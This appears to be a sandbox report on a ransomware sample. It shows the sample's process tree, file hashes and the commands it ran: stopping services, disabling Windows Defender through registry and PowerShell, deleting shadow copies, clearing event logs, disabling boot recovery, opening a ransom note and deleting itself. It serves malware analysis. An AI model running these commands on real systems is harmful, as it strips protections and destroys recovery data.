memory of 1288 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1288 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1288 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1756 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1756 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1756 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1948 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1948 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1948 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1244 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1244 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1244 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1008 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1008 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 1008 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe PID 944 wrote to memory of 892 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1036
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1616
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:812
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1004
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1320
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1632
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1392
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1284
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1288
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1756
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1948
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1244
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1008
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:892
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1924
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1608
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:428
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:572
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1520
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1304
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1928
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1512
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:980
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1044
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1564
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:940
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:720
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1828
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1772
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:660
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1388
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1560
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1336
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:336
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1284
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1536
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2028 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:544
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1824 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:592 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1976 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1332
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176 -
C:\Windows\system32\notepad.exenotepad.exe C:\Bdfn_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2520 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"2⤵PID:2528
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2552
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9462dca09abeb3961f88cfb6b2d54ca7
SHA1ab4d8445f852cb514e73f611be5c9f30d28861ca
SHA256ed6fed4612fa79435fdb285e29629d3d053ad77d2c0727d7aa1b2453a6a9c3fa
SHA5127ab3f07b129f181d7738a068eb3657cb395863689bffe6c98ea9647948a67f82c44ad66c1907b9cfc8e623edfe8a1a5b149624e2913f6d56dead5bb56235cab4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD504eeccf0e131af62b6301f5b0b0ff47a
SHA1ba763c47a01a24e326fc2dc49d5ae8e8d294c9fe
SHA25672af9f971933498fc59abaf6e92d02d85bbb6d58333c645bc0ec5da65ccb375e
SHA512241a76e6985d1de36c585591afaade412d810799345ed872a211bc7552a37a3473f6a473725ba63510aedb9c710eb13a0216da7920b05c773f6e40ed755133cd